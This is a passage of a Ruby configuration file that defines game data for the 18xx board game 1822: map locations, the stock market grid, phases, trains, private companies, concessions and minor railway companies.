'D35' => 'Swansea & Oystermouth',
'D41' => 'Exeter',
'E2' => 'Highlands',
'E6' => 'Glasgow',
'E28' => 'Mid Wales',
'E32' => 'Merthyr Tydfil & Pontypool',
'E40' => 'Taunton',
'F3' => 'Stirling',
'F5' => 'Castlecary',
'F7' => 'Hamilton & Coatbridge',
'F11' => 'Dumfries',
'F23' => 'Holyhead',
'F35' => 'Cardiff',
'G4' => 'Falkirk',
'G12' => 'Carlisle',
'G16' => 'Barrow',
'G20' => 'Blackpool',
'G22' => 'Liverpool',
'G24' => 'Chester',
'G28' => 'Shrewbury',
'G32' => 'Hereford',
'G34' => 'Newport',
'G36' => 'Bristol',
'G42' => 'Dorehester',
'H1' => 'Aberdeen',
'H3' => 'Dunfermline',
'H5' => 'Edinburgh',
'H13' => 'Penrith',
'H17' => 'Lancaster',
'H19' => 'Preston',
'H21' => 'Wigan & Bolton',
'H23' => 'Warrington',
'H25' => 'Crewe',
'H33' => 'Gloucester',
'H37' => 'Bath & Radstock',
'I22' => 'Manchester',
'I26' => 'Stoke-on-Trent',
'I30' => 'Birmingham',
'I40' => 'Salisbury',
'I42' => 'Bournemouth',
'J15' => 'Darlington',
'J21' => 'Bradford',
'J29' => 'Derby',
'J31' => 'Coventry',
'J41' => 'Southamton',
'K10' => 'Newcastle',
'K12' => 'Durham',
'K14' => 'Middlesbrough',
'K20' => 'Leeds',
'K24' => 'Sheffield',
'K28' => 'Nottingham',
'K30' => 'Leicester',
'K36' => 'Oxford',
'K38' => 'Reading',
'K42' => 'Portsmouth',
'L19' => 'York',
'L33' => 'Northamton',
'M16' => 'Scarborough',
'M26' => 'Lincoln',
'M30' => 'Peterborough',
'M36' => 'Hertford',
'M38' => 'London',
'M42' => 'Brighton',
'N21' => 'Hull',
'N23' => 'Grimsby',
'N33' => 'Cambridge',
'O30' => "King's Lynn",
'O36' => 'Colchester',
'O40' => 'Maidstone',
'O42' => 'Folkstone',
'P35' => 'Ipswich',
'P39' => 'Canterbury',
'P41' => 'Dover',
'P43' => 'English Channel',
'Q44' => 'France',
}.freeze
MARKET = [
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '550', '600', '650', '700e'],
['', '', '', '', '', '', '', '', '', '', '', '', '', '330', '360', '400', '450', '500', '550', '600', '650'],
['', '', '', '', '', '', '', '', '', '200', '220', '245', '270', '300', '330', '360', '400', '450', '500',
'550', '600'],
%w[70 80 90 100 110 120 135 150 165 180 200 220 245 270 300 330 360 400 450 500 550],
%w[60 70 80 90 100px 110 120 135 150 165 180 200 220 245 270 300 330 360 400 450 500],
%w[50 60 70 80 90px 100 110 120 135 150 165 180 200 220 245 270 300 330],
%w[45y 50 60 70 80px 90 100 110 120 135 150 165 180 200 220 245],
%w[40y 45y 50 60 70px 80 90 100 110 120 135 150 165 180],
%w[35y 40y 45y 50 60px 70 80 90 100 110 120 135],
%w[30y 35y 40y 45y 50p 60 70 80 90 100],
%w[25y 30y 35y 40y 45y 50 60 70 80],
%w[20y 25y 30y 35y 40y 45y 50y 60y],
%w[15y 20y 25y 30y 35y 40y 45y],
%w[10y 15y 20y 25y 30y 35y],
%w[5y 10y 15y 20y 25y],
].freeze
PHASES = [
{
name: '1',
on: '',
train_limit: { minor: 2, major: 4 },
tiles: [:yellow],
operating_rounds: 1,
},
{
name: '2',
on: %w[2 3],
train_limit: { minor: 2, major: 4 },
tiles: [:yellow],
status: ['can_convert_concessions'],
operating_rounds: 2,
},
{
name: '3',
on: '3',
train_limit: { minor: 2, major: 4 },
tiles: %i[yellow green],
status: %w[can_buy_trains can_convert_concessions],
operating_rounds: 2,
},
{
name: '4',
on: '4',
train_limit: { minor: 1, major: 3 },
tiles: %i[yellow green],
status: %w[can_buy_trains can_convert_concessions],
operating_rounds: 2,
},
{
name: '5',
on: '5',
train_limit: { minor: 1, major: 2 },
tiles: %i[yellow green brown],
status: %w[can_buy_trains
can_acquire_minor_bidbox
can_par
minors_green_upgrade],
operating_rounds: 2,
},
{
name: '6',
on: '6',
train_limit: { minor: 1, major: 2 },
tiles: %i[yellow green brown],
status: %w[can_buy_trains
can_acquire_minor_bidbox
can_par
full_capitalisation
minors_green_upgrade],
operating_rounds: 2,
},
{
name: '7',
on: '7',
train_limit: { minor: 1, major: 2 },
tiles: %i[yellow green brown gray],
status: %w[can_buy_trains
can_acquire_minor_bidbox
can_par
full_capitalisation
minors_green_upgrade],
operating_rounds: 2,
},
].freeze
TRAINS = [
{
name: 'L',
distance: [
{
'nodes' => ['city'],
'pay' => 1,
'visit' => 1,
},
{
'nodes' => ['town'],
'pay' => 1,
'visit' => 1,
},
],
num: 22,
price: 60,
rusts_on: '3',
variants: [
{
name: '2',
distance: 2,
price: 120,
rusts_on: '4',
available_on: '1',
},
],
},
{
name: '3',
distance: 3,
num: 9,
price: 200,
rusts_on: '6',
},
{
name: '4',
distance: 4,
num: 6,
price: 300,
rusts_on: '7',
},
{
name: '5',
distance: 5,
num: 5,
price: 500,
events: [
{
'type' => 'close_concessions',
},
],
},
{
name: '6',
distance: 6,
num: 3,
price: 600,
events: [
{
'type' => 'full_capitalisation',
},
],
},
{
name: '7',
distance: 7,
num: 20,
price: 750,
variants: [
{
name: 'E',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 99,
'visit' => 99,
'multiplier' => 2,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 1000,
},
],
},
{
name: '2P',
distance: 2,
num: 2,
price: 0,
},
{
name: '5P',
distance: 5,
num: 1,
price: 0,
},
{
name: 'P+',
distance: [
{
'nodes' => ['city'],
'pay' => 99,
'visit' => 99,
},
{
'nodes' => ['town'],
'pay' => 99,
'visit' => 99,
},
],
num: 2,
price: 0,
},
].freeze
COMPANIES = [
{
name: 'Butterley Engineering Company',
sym: 'P1',
value: 0,
revenue: 5,
desc: 'MAJOR, Phase 5. 5-Train. This is a normal 5-train that is subject to all of the normal rules. '\
'Note that a company can acquire this private company at the start of its turn, even if it is '\
'already at its train limit as this counts as an acquisition action, not a train buying action. '\
'However, once acquired the acquiring company needs to check whether it is at train limit and '\
'discard any trains held in excess of limit.',
abilities: [],
color: nil,
},
{
name: 'Middleton Railway',
sym: 'P2',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 2. Remove Small Station. NO LAY TRACK CHECK. Make sure the laid track is '\
'valid. Allows the owning company to place a plain yellow track tile directly on an undeveloped '\
'small station hex location or upgrade a small station tile of one colour to a plain track tile '\
'of the next colour. This closes the company and counts as the company’s normal track laying '\
'step. All other normal track laying restrictions apply. Once acquired, the private company pays '\
'its revenue to the owning company until the power is exercised and the company is closed.',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 1,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: %w[7 8 9 80 81 82 83 544 545 546 60 169],
},
],
color: nil,
},
{
name: 'Shrewsbury and Hereford Railway',
sym: 'P3',
value: 0,
revenue: 0,
desc: 'MAJOR, Phase 2. Permanent 2-Train. 2P-train is a permanent 2-train. It can’t be sold to another '\
'company. It does not count against train limit. It does not count as a train for the purpose of '\
'mandatory train ownership and purchase. A company may not own more than one 2P train. Dividends '\
'can be separated from other trains and may be split, paid in full, or retained. If a company '\
'runs a 2P-train and pays a dividend (split or full), but retains its dividend from other train '\
'operations this still counts as a normal dividend for stock price movement purposes. Vice-versa, '\
'if a company pays a dividend (split or full) with its other trains, but retains the dividend '\
'from the 2P, this also still counts as a normal dividend for stock price movement purposes. Does '\
'not close.',
abilities: [],
color: nil,
},
{
name: 'South Devon Railway',
sym: 'P4',
value: 0,
revenue: 0,
desc: 'MAJOR, Phase 2. Permanent 2-Train. 2P-train is a permanent 2-train. It can’t be sold to another '\
'company. It does not count against train limit. It does not count as a train for the purpose of '\
'mandatory train ownership and purchase. A company may not own more than one 2P train. Dividends '\
'can be separated from other trains and may be split, paid in full, or retained. If a company '\
'runs a 2P-train and pays a dividend (split or full), but retains its dividend from other train '\
'operations this still counts as a normal dividend for stock price movement purposes. Vice-versa, '\
'if a company pays a dividend (split or full) with its other trains, but retains the dividend '\
'from the 2P, this also still counts as a normal dividend for stock price movement purposes. '\
'Does not close.',
abilities: [],
color: nil,
},
{
name: 'London, Chatham and Dover Railway',
sym: 'P5',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 3. English Channel. The owning company may place an exchange station token on the '\
'map, free of charge, in a token space in the English Channel. The company does not need to be '\
'able to trace a route to the English Channel to use this property (i.e. any company can use this '\
'power to place a token in the English Channel). If no token spaces are available, but a space '\
'could be created by upgrading the English Channel track then this power may be used to place a '\
'token and upgrade the track simultaneously. This counts as the acquiring company’s tile lay '\
'action and incurs the usual costs for doing so. Alternatively, it can move an exchange station '\
'token to the available station token section on its company charter.',
abilities: [],
color: nil,
},
{
name: 'Leeds & Selby Railway',
sym: 'P6',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 3. Mail Contract. After running trains, the owning company receives income into its '\
'treasury equal to one half of the base value of the start and end stations from one of the '\
'trains operated. Doubled values (for E trains or destination tokens) do not count. The company '\
'is not required to maximise the dividend from its run if it wishes to maximise its revenue from '\
'the mail contract by stopping at a large city and not running beyond it to include small '\
'stations. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Shrewsbury and Birmingham Railway',
sym: 'P7',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 3. Mail Contract. After running trains, the owning company receives income into its '\
'treasury equal to one half of the base value of the start and end stations from one of the '\
'trains operated. Doubled values (for E trains or destination tokens) do not count. The company '\
'is not required to maximise the dividend from its run if it wishes to maximise its revenue from '\
'the mail contract by stopping at a large city and not running beyond it to include small '\
'stations. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Edinburgh and Glasgow Railway',
sym: 'P8',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. Mountain/Hill Discount. Either: The acquiring company receives a discount '\
'token that can be used to pay the full cost of a single track tile lay on a rough terrain, hill '\
'or mountain hex. This closes the company. Or: The acquiring company rejects the token and '\
'receives a £20 discount off the cost of all hill and mountain terrain (i.e. NOT off the cost of '\
'rough terrain). The private company does not close. Closes if free token taken when acquired. '\
'Otherwise, flips when acquired and does not close.',
abilities: [],
color: nil,
},
{
name: 'Midland and Great Northern Joint Railway',
sym: 'P9',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. Declare 2x Cash Holding. If held by a player, the holding player may '\
'declare double their actual cash holding at the end of a stock round to determine player turn '\
'order in the next stock round. If held by a company it pays revenue of '\
'£20 (green)/£40 (brown)/£60 (grey). Does not close.',
abilities: [],
color: nil,
},
{
name: 'Glasgow and South- Western Railway',
sym: 'P10',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. River/Estuary Discount. The acquiring company receives two discount tokens '\
'each of which can be used to pay the cost for one track lay over an estuary crossing. They can '\
'be used on the same or different tile lays. Use of the second token closes the company. In '\
'addition, until the company closes it provides a discount of £10 against the cost of all river '\
'terrain (excluding estuary crossings).',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 2,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: [],
},
{
type: 'tile_discount',
owner_type: 'corporation',
discount: 10,
terrain: 'swamp',
},
],
color: nil,
},
{
name: 'Bristol & Exeter Railway',
sym: 'P11',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 2. Advanced Tile Lay. The owning company may lay one plain or small station '\
'track upgrade using the next colour of track to be available, before it is actually made '\
'available by phase progression. The normal rules for progression of track lay must be followed '\
'(i.e. grey upgrades brown upgrades green upgrades yellow) it is not possible to skip a colour '\
'using this private. All other normal track laying restrictions apply. This is in place of its '\
'normal track lay action. Once acquired, the private company pays its revenue to the owning '\
'company until the power is exercised and the company closes.',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 1,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: %w[80 81 82 83 544 545 546 60 169 141 142 143 144 145 146 147 X17],
},
],
color: nil,
},
{
name: 'Leicester & Swannington Railway',
sym: 'P12',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 3. Extra Tile Lay. The owning company may lay an additional yellow tile (or '\
'two for major companies), or make one additional tile upgrade in its track laying step. The '\
'upgrade can be to a tile laid in its normal tile laying step. All other normal track laying '\
'restrictions apply. Once acquired, the private company pays its revenue to the owning company '\
'until the power is exercised and the company closes.',
abilities: [
{
type: 'tile_lay',
owner_type: 'corporation',
when: 'track',
count: 2,
reachable: true,
closed_when_used_up: true,
hexes: [],
tiles: [],
},
],
color: nil,
},
{
name: 'York, Newcastle and Berwick Railway',
sym: 'P13',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 5. Pullman. A “Pullman” carriage train that can be added to another train '\
'owned by the company. It converts the train into a + train. Does not count against train limit '\
'and does not count as a train for the purposes of train ownership. Can’t be sold to another '\
'company. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Kilmarnock and Troon Railway',
sym: 'P14',
value: 0,
revenue: 10,
desc: 'MAJOR/MINOR, Phase 5. Pullman. A “Pullman” carriage train that can be added to another train '\
'owned by the company. It converts the train into a + train. Does not count against train limit '\
'and does not count as a train for the purposes of train ownership. Can’t be sold to another '\
'company. Does not close.',
abilities: [],
color: nil,
},
{
name: 'Highland Railway',
sym: 'P15',
value: 0,
revenue: 0,
desc: 'MAJOR/MINOR, Phase 2. £10x Phase. Pays revenue of £10 x phase number to the player, and pays '\
'treasury credits of £10 x phase number to the private company. This credit is retained on the '\
'private company charter. When acquired, the acquiring company receives this treasury money and '\
'this private company closes. If not acquired beforehand, this company closes at the start of '\
'Phase 7 and all treasury credits are returned to the bank.',
abilities: [],
color: nil,
},
{
name: 'Off-Shore Tax Haven',
sym: 'P16',
value: 0,
revenue: 0,
desc: 'CAN NOT BE AQUIRED. Tax Haven. As a stock round action, under the direction and funded by the '\
'owning player, the off-shore Tax Haven may purchase an available share certificate and place it '\
'onto P16’s charter. The certificate is not counted for determining directorship of a company. '\
'The share held in the tax haven does NOT count against the 60% share limit for purchasing '\
'shares. If at 60% (or more) in hand in a company, a player can still purchase an additional '\
'share in that company and place it in the tax haven. Similarly, if a player holds 50% of a '\
'company, plus has 10% of the same company in the tax haven, they can buy a further 10% share. '\
'A company with a share in the off-shore tax haven CAN be “all sold out” at the end of a stock '\
'round. Dividends paid to the share are also placed onto the off-shore tax haven charter. At the '\
'end of the game, the player receives the share certificate from the off-shore tax haven charter '\
'and includes it in their portfolio for determining final worth. The player also receives the '\
'cash from dividend income accumulated on the charter. Can’t be acquired. Does not count against '\
'the certificate limit.',
abilities: [],
color: nil,
},
{
name: 'Lancashire Union Railway',
sym: 'P17',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 2. Move Card. Allows the director of the owning company to select one concession, '\
'private company, or minor company from the relevant stack of certificates, excluding those items '\
'currently in the bidding boxes, and move it to the top or the bottom of the stack. Closes when '\
'the power is exercised.',
abilities: [],
color: nil,
},
{
name: 'Cromford Union and High Peak Railway',
sym: 'P18',
value: 0,
revenue: 10,
desc: 'MAJOR, Phase 5. Station Marker Swap. Allows the owning company to move a token from the exchange '\
'token area of its charter to the available token area, or vice versa. This company closes when '\
'its power is exercised.',
abilities: [],
color: nil,
},
{
name: 'CONCESSION: London and North West Railway',
sym: 'C1',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and converts into the LNWR’s 10% director certificate. LNWR may also put '\
'it’s destination token into Manchester when converted.',
abilities: [
{
type: 'exchange',
corporations: ['LNWR'],
owner_type: 'player',
from: 'par',
},
],
color: '#000',
text_color: 'white',
},
{
name: 'CONCESSION: Great Western Railway',
sym: 'C2',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the GWR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['GWR'],
owner_type: 'player',
from: 'par',
},
],
color: '#165016',
text_color: 'white',
},
{
name: 'CONCESSION: London, Brighton and South Coast Railway',
sym: 'C3',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the LBSCR director’s '\
'certificate.',
abilities: [
{
type: 'exchange',
corporations: ['LBSCR'],
owner_type: 'player',
from: 'par',
},
],
color: '#cccc00',
text_color: 'white',
},
{
name: 'CONCESSION: South Eastern & Chatham Railway',
sym: 'C4',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the SECR director’s '\
'certificate.',
abilities: [
{
type: 'exchange',
corporations: ['SECR'],
owner_type: 'player',
from: 'par',
},
],
color: '#ff7f2a',
text_color: 'white',
},
{
name: 'CONCESSION: Caledonian Railway',
sym: 'C5',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the CR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['CR'],
owner_type: 'player',
from: 'par',
},
],
color: '#5555ff',
text_color: 'white',
},
{
name: 'CONCESSION: Midland Railway',
sym: 'C6',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the MR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['MR'],
owner_type: 'player',
from: 'par',
},
],
color: '#ff2a2a',
text_color: 'white',
},
{
name: 'CONCESSION: Lancashire & Yorkshire',
sym: 'C7',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the LYR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['LYR'],
owner_type: 'player',
from: 'par',
},
],
color: '#2d0047',
text_color: 'white',
},
{
name: 'CONCESSION: North British Railway',
sym: 'C8',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the NBR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['NBR'],
owner_type: 'player',
from: 'par',
},
],
color: '#a05a2c',
text_color: 'white',
},
{
name: 'CONCESSION: South Wales Railway',
sym: 'C9',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the SWR director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['SWR'],
owner_type: 'player',
from: 'par',
},
],
color: '#999999',
text_color: 'white',
},
{
name: 'CONCESSION: North Eastern Railway',
sym: 'C10',
value: 100,
revenue: 10,
desc: 'Have a face value £100 and contribute £100 to the conversion into the NER director’s certificate.',
abilities: [
{
type: 'exchange',
corporations: ['NER'],
owner_type: 'player',
from: 'par',
},
],
color: '#aade87',
text_color: 'white',
},
{
name: 'MINOR: 1. Great North of Scotland Railway',
sym: 'M1',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is H1.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 2. Lanarkshire & Dumbartonshire Railway',
sym: 'M2',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is E2.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 3. Edinburgh & Dalkeith Railway',
sym: 'M3',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is H5.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 4. Newcastle & North shields Railway',
sym: 'M4',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is K10.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 5. Stockton and Darlington Railway',
sym: 'M5',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is J15.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 6. Furness railway',
sym: 'M6',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is G16.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 7. Warrington & Newton Railway',
sym: 'M7',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is H23.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 8. Manchester Sheffield & Lincolnshire Railway',
sym: 'M8',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is K24.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 9. East Lincolnshire Railway',
sym: 'M9',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is N23.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 10. Grand Junction Railway',
sym: 'M10',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is I30.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 11. Great Northern Railway',
sym: 'M11',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M30.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 12. Eastern Union Railway',
sym: 'M12',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is P35.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 13. Headcorn & Maidstone Junction Light Railway',
sym: 'M13',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is O40.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 14. Metropolitan Railway',
sym: 'M14',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M38.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 15. London Tilbury & Southend Railway',
sym: 'M15',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M38.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 16. Wycombe Railway',
sym: 'M16',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is M38.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 17. London & Southampton Railway',
sym: 'M17',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is J41.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 18. Somerset & Dorset Joint Railway',
sym: 'M18',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is I42.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 19. Penarth Harbour & Dock Railway Company',
sym: 'M19',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is F35.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 20. Monmouthshire Railway & Canal Company',
sym: 'M20',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is F33.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 21. Taff Vale railway',
sym: 'M21',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is E34.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 22. Exeter and Crediton Railway',
sym: 'M22',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is D41.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 23. West Cornwall Railway',
sym: 'M23',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is A42.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
{
name: 'MINOR: 24. The Swansea and Mumbles Railway',
sym: 'M24',
value: 100,
revenue: 0,
desc: 'A 50% director’s certificate in the associated minor company. Starting location is D35.',
abilities: [],
color: '#ffffff',
text_color: 'black',
},
].freeze
CORPORATIONS = [
{
sym: '1',
name: 'Great North of Scotland Railway',
logo: '1822/1',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'H1',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '2',
name: 'Lanarkshire & Dumbartonshire Railway',
logo: '1822/2',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'E2',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '3',
name: 'Edinburgh & Dalkeith Railway',
logo: '1822/3',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'H5',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '4',
name: 'Newcastle & North shields Railway',
logo: '1822/4',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'K10',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '5',
name: 'Stockton and Darlington Railway',
logo: '1822/5',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'J15',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '6',
name: 'Furness railway',
logo: '1822/6',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'G16',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '7',
name: 'Warrington & Newton Railway',
logo: '1822/7',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'H23',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '8',
name: 'Manchester Sheffield & Lincolnshire Railway',
logo: '1822/8',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'K24',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '9',
name: 'East Lincolnshire Railway',
logo: '1822/9',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'N23',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '10',
name: 'Grand Junction Railway',
logo: '1822/10',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'I30',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '11',
name: 'Great Northern Railway',
logo: '1822/11',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'M30',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '12',
name: 'Eastern Union Railway',
logo: '1822/12',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'P35',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '13',
name: 'Headcorn & Maidstone Junction Light Railway',
logo: '1822/13',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'O40',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '14',
name: 'Metropolitan Railway',
logo: '1822/14',
tokens: [20],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '15',
name: 'London Tilbury & Southend Railway',
logo: '1822/15',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'M38',
city: 4,
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '16',
name: 'Wycombe Railway',
logo: '1822/16',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'M38',
city: 2,
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '17',
name: 'London & Southampton Railway',
logo: '1822/17',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'J41',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '18',
name: 'Somerset & Dorset Joint Railway',
logo: '1822/18',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'I42',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '19',
name: 'Penarth Harbour & Dock Railway Company',
logo: '1822/19',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'F35',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '20',
name: 'Monmouthshire Railway & Canal Company',
logo: '1822/20',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'F33',
color: '#ffffff',
text_color: 'black',
reservation_color: nil,
},
{
sym: '21',
name: 'Taff Vale railway',
logo: '1822/21',
tokens: [0],
type: 'minor',
always_market_price: true,
float_percent: 100,
hide_shares: true,
shares: [100],
max_ownership_percent: 100,
coordinates: 'E34',
color: '#ffffff',
